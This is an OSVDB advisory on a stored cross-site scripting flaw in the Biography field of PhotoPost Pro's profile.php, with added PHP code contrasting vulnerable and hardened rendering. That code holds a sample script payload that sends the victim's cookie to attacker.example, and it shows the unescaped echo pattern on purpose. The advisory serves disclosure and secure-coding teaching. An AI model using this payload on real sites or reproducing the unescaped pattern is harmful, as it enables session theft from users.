PhotoPost Pro profile.php Biography Field XSS

2005-03-11T05:40:19
ID OSVDB:14682
Type osvdb
Reporter Igor Franchuk (sprog@online.ru)
Modified 2005-03-11T05:40:19

Description

Vulnerability Description

PhotoPost Pro contains a flaw that allows a remote cross site scripting attack. The application does not validate input in the 'Biography' field when it is submitted to the 'profile.php' script, so a user can place HTML or script markup in that field via a specially crafted URL or form submission. When the field is later rendered unencoded, the script executes in the browser of any user who views it, within the trust relationship between the browser and the server, leading to a loss of integrity (for example, the victim's session cookie can be read, or actions can be taken in the victim's name).
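The following is an added illustration, not PhotoPost code: a minimal stand-in for the profile.php Biography handling described above, first as the vulnerable pattern (value stored and echoed as-is) and then hardened by encoding at the point of HTML output, with an optional input check. Function names, the field name and the sample submission are assumptions made for the example.

```php
<?php
// Added example (not PhotoPost Pro code). Models the Biography field flaw
// described in the advisory and one way to fix it. Names are assumptions.

declare(strict_types=1);

// Constructed sample submission: what a malicious user would type into the
// Biography field. It is inert text here; it only matters once a browser
// renders it unencoded.
const SAMPLE_BIOGRAPHY = 'Photographer from Kyiv '
    . '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: the submitted value is accepted without validation ...
function store_biography_vulnerable(string $submitted): string
{
    return $submitted;
}

// ... and interpolated straight into the profile page HTML, so every
// visitor to the profile runs the embedded script.
function render_profile_vulnerable(string $storedBiography): string
{
    return "<div class=\"bio\">{$storedBiography}</div>";
}

// HARDENED: encode at the point where the value becomes HTML. ENT_QUOTES
// also covers attribute contexts; the charset must match the page's.
function escape_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_profile_safe(string $storedBiography): string
{
    return '<div class="bio">' . escape_html($storedBiography) . '</div>';
}

// Optional defence in depth at submission time: a biography has no business
// carrying markup, so reject angle brackets and oversized values outright.
function validate_biography(string $submitted, int $maxLength = 2000): bool
{
    if (strlen($submitted) > $maxLength) {
        return false;
    }
    return strpbrk($submitted, '<>') === false;
}

if (PHP_SAPI === 'cli') {
    $stored = store_biography_vulnerable(SAMPLE_BIOGRAPHY);
    echo "Vulnerable render:\n", render_profile_vulnerable($stored), "\n\n";
    echo "Hardened render:\n", render_profile_safe($stored), "\n\n";
    echo "Input validation accepts the payload: ",
        validate_biography(SAMPLE_BIOGRAPHY) ? "yes (bad)" : "no (rejected)", "\n";
}
```

Run it with `php profile_xss_example.php`: the vulnerable render contains a live `<script>` element, the hardened render shows `&lt;script&gt;` as harmless text, and the validator rejects the submission. Output encoding is the fix that actually closes the hole; the input check only narrows what reaches storage and must not be relied on alone.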

Solution Description

Upgrade to version 5.01 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PhotoPost Pro does not validate the 'Biography' field submitted to 'profile.php', allowing a remote cross site scripting attack against users who view the stored value.

References:

Vendor URL: http://www.photopost.com/
Secunia Advisory ID: 14576
Related OSVDB ID: 14679
Related OSVDB ID: 14680
Related OSVDB ID: 14681
Related OSVDB ID: 14683
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0200.html
ISS X-Force ID: 19678
CVE ID: CVE-2005-0777
Bugtraq ID: 12779